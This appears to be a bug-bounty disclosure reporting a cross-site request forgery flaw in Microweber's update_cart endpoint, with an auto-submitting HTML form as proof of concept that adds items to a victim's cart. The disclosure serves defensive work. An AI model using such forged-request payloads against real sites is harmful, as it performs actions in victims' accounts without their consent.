Cross-Site Request Forgery (CSRF) in microweber/microweber
Valid
Reported on
Jul 20th 2021
✍️ Description
microweber
is vulnerable to Cross-site request forgery. The app is not checking the CSRF token when adding new products to the cart.
🕵️♂️ Proof of Concept
HTML content:
<form id="form" action="http://localhost/api/update_cart" method="POST" >
<input type="text" name="for" value="content">
<input type="text" name="for_id" value="1">
<input type="text" name="price" value="100">
<input type="submit">
</form>
<script>
setTimeout(() => {
form.submit();
}, 2000);
</script>
- Save the above content into an HTML file.
- Open the file on the browser and check the cart.
💥 Impact
When a victim access a malicious page, it is possible to add products to the victim's cart.
Occurrences
We have contacted a member of the
microweber
team and are waiting to hear back
a year ago
to join this conversation